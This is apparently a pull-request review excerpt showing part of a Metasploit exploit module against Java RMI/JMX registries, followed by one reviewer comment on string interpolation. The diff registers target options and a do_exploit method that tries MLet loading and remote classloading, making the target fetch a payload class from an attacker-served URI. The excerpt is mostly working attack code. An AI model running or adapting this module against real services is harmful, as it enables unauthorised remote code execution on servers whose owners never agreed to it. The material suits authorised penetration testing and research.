modules/exploits/multi/java/rmi_server.rb

```diff
@@ -0,0 +1,152 @@
+        'Targets'        =>
+          [
+            ['Generic', {
+              'Arch' => ARCH_JAVA
+            }]
+          ],
+        'DefaultTarget'  => 0
+      )
+    )
+
+    register_options(
+      [
+        Opt::RHOST(),
+        Opt::RPORT(1099),
+        OptBool.new('SSL', [true, 'Connect using SSL', false]),
+        OptBool.new('CHECK_REFS', [true, 'Check objects referenced in registry', true]),
+        OptBool.new('FOLLOW_REMOTE_REFS', [true, 'Follow remote references that could point to other systems', false]),
+        OptBool.new('TRY_DESER', [true, 'Try exploit deserialization', true]),
+        OptBool.new('TRY_MLET', [true, 'Try exploit MLet loading', true]),
+        OptBool.new('TRY_CLASSLOAD', [true, 'Try exploit remote location classloading', true]),
+        OptString.new('USERNAME', [false, 'JMX username']),
+        OptString.new('PASSWORD', [false, 'JMX password']),
+
+        OptInt.new('METHOD_ID', [false, 'Method ID for testing custom legacy objects', -1]),
+        OptInt.new('METHOD_HASH', [false, 'Method Hash for testing custom objects']),
+        OptString.new('METHOD_SIGNATURE', [false, 'Method signature for testing custom objects (Format: <methodName> + <internalJavaSignature>, for example test(Ljava/lang/String;)Lmy/return/Type;'])
+      ]
+    )
+  end
+
+  def create_config(datastore)
+    Msf::Exploit::Java::Serialized::RMI::PropRunConfig.new(datastore)
+  end
+
+  def collect
+    check = Msf::Exploit::Java::Serialized::RMI::RMICheck.new(datastore['RHOST'],
+                                       datastore['RPORT'],
+                                       ssl: datastore['SSL'],
+                                       username: datastore['USERNAME'],
+                                       password: datastore['PASSWORD'],
+                                       rc: create_config(datastore))
+    
+    begin
+      check.run
+    rescue Rex::Java::JRMP::JRMPError => e
+      root = Rex::Java::JRMP::Util.unwrap_exception(e.ex)
+      print_status 'Check returned error: ' + root[0][0] + ':' + root[1]['detailMessage']
+    end
+  end
+
+
+  def do_exploit(vector)
+    if vector.id[0] == 'mlet'
+      print_status 'Trying MLET loading'
+      begin
+        vector.deliver(get_uri + '/mlet')
+        return
+      rescue Rex::Java::JRMP::JRMPError => e
+        root = Rex::Java::JRMP::Util.unwrap_exception(e.ex)
+        print_status 'MLet load returned error' + root[0][0] + ':' + root[1]['detailMessage']
+      rescue Timeout::Error
+        return if session_created?
+        raise
+      end
+      return
+    elsif vector.id[0] == 'classload'
+      info 'Trying to invoke remote classloading'
+      begin
+        vector.deliver([get_uri + '/', 'metasploit.StaticPayload'])
+        return
+      rescue Rex::Java::JRMP::JRMPError => e
+        root = Rex::Java::JRMP::Util.unwrap_exception(e.ex)
+        print_status 'Load returned error: ' + root[0][0] + ':' + root[1]['detailMessage']
```

Comment:
I'm not sure if the `root` elements can ever be `nil`. String interpolation is usually preferred, as it is `nil` safe.

```suggestion
        print_status "Load returned error: #{root[0][0]}:#{root[1]['detailMessage']}"
```